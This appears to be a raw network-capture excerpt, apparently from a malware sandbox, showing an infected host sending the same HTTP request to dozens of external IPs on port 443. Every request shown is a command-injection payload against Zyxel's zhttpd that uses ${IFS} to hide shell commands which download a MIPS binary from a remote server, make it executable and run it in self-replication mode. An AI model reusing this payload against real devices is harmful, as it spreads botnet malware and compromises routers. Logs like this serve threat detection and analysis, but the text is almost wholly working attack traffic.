                                                Jan 12, 2024 18:16:22.435477972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4316192.168.2.233745884.193.132.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435503960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4317192.168.2.2346678142.41.110.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435564041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4318192.168.2.233417087.193.79.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435597897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4319192.168.2.2341790106.238.197.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435637951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4320192.168.2.2355660190.169.38.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435686111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4321192.168.2.2359416200.199.243.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435717106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4322192.168.2.234406049.46.212.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435748100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4323192.168.2.2349402106.105.190.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435775042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4324192.168.2.2337978220.31.112.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435806036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4325192.168.2.2359304195.146.250.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435830116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4326192.168.2.2358168204.227.44.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435872078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4327192.168.2.233833487.25.46.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435908079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4328192.168.2.2359972147.22.169.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435946941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4329192.168.2.2360876210.123.15.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435982943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4330192.168.2.2354846117.176.11.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.436018944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4331192.168.2.235263827.214.33.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.436068058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4332192.168.2.233389238.215.57.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.436100006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4333192.168.2.2345368135.197.128.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.436145067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4334192.168.2.235688639.49.81.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.436177969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4335192.168.2.2341336175.2.77.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.436213970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4336192.168.2.2356150144.35.209.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.436265945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4337192.168.2.235811036.176.34.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.436295986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4338192.168.2.2355408210.167.223.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.436325073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4339192.168.2.235593018.110.229.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.436371088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4340192.168.2.23447344.113.143.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.436413050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4341192.168.2.2348292197.53.140.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.436449051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4342192.168.2.235733877.205.141.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.436459064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4343192.168.2.234207454.201.67.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.436499119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4344192.168.2.234942017.138.51.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.436554909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4345192.168.2.234042462.131.234.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.451765060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4346192.168.2.234448450.186.38.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.451828957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4347192.168.2.233928449.83.73.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.451894045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4348192.168.2.2354302100.201.151.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.451958895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4349192.168.2.2342450212.216.206.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.452012062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4350192.168.2.233763691.233.197.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.452083111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4351192.168.2.2338080155.9.32.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.452140093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4352192.168.2.2350954211.1.130.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.452197075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4353192.168.2.2354862189.31.172.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.452260017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4354192.168.2.2338600222.19.196.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.452321053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4355192.168.2.2339504113.11.208.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.452379942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4356192.168.2.2340978168.106.82.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.452455044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4357192.168.2.2345178101.158.116.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.452527046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4358192.168.2.2348114190.40.25.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.452598095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4359192.168.2.2337318114.224.162.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.452652931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4360192.168.2.2349468130.216.75.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.452708960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4361192.168.2.233305889.104.139.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.452774048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4362192.168.2.2342368116.223.66.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.452833891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4363192.168.2.2340338156.159.12.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.452896118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4364192.168.2.2345908195.15.88.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.452954054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4365192.168.2.235168037.138.42.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.452991962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4366192.168.2.2338504128.71.76.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.453052998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4367192.168.2.234685217.183.7.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.453107119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4368192.168.2.235464496.142.11.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.453151941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4369192.168.2.2344588138.90.175.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.453197002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4370192.168.2.23470184.36.105.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.453243971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4371192.168.2.233557075.77.173.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.453303099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4372192.168.2.235217658.161.203.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.453341007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4373192.168.2.233280623.141.111.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.453407049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4374192.168.2.233850060.119.24.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.453471899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4375192.168.2.2356088120.251.126.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.453515053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4376192.168.2.2349636172.179.116.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.453557014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4377192.168.2.233614051.113.69.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.453632116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4378192.168.2.235330660.237.21.210443
                                                TimestampBytes transferredDirectionData
